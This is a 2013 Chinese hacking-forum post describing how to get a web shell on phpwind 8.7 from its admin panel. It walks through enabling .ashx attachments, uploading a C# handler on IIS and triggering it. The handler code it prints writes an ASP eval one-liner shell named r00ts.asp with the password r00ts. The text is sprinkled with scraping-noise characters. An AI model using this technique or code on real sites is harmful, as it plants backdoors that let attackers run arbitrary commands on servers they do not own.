找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2104|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小! _- p5 _5 Q; @! x

/ G% V  b* E- F& u/ |群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx8 ?3 u; w7 `) T& a

2 ]6 _- x0 R& q发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
3 Y2 j) i2 g" Y0 F4 o( ?' A 4 i; E( z3 z* w4 y  h5 ^) j
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
" g4 k2 w, u3 ?, @3 \! ]7 ^) a& m * o9 z/ ?7 {# L  x
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts) w$ Q; }& J& k4 e0 w
; ?* f, x" Z6 Y6 I9 t8 e& G
下面是代码:! Z7 @/ o& V. Y" l9 a0 t) A
+ s  `# U! h4 V% S1 ]0 T# K
<%@ WebHandler Language="C#"Class="Handler" %>5 Y# @. X9 Q: w0 G8 R
using System;
2 p4 n* Z" b: W1 `  Nusing System.Web;
# i2 h/ z6 I# ausing System.IO;5 l/ d) C) \, m4 v; X
public class Handler : IHttpHandler {
6 O& A4 T  @4 R$ X* ppublic void ProcessRequest (HttpContext context) {2 m( u! k5 |: S& U5 z$ Y7 h5 h
context.Response.ContentType = "text/plain";+ V2 I9 z: f4 H. f* b9 h+ o
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));$ T6 h& H+ b' I
file1.Write("<%eval request(\"r00ts\")%>");- R* \) S1 R$ C8 p9 ?0 [% l- z) t4 b0 u0 G
file1.Flush();
$ r3 T6 x& `, \/ I4 g, Y3 q  Z: @file1.Close();
7 T0 X+ e# D  \  A  T( {}4 D  W0 `  M/ S' q$ A
public bool IsReusable {
. C4 H8 l4 s' e9 tget {
! w' ~/ U3 J7 ireturn false;
; I8 h, _1 u- b7 Y}2 X" P) C5 ?7 g! q
}
' L( F# O" O% z6 _0 t! }}! f# L" L3 I1 Q* _( z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表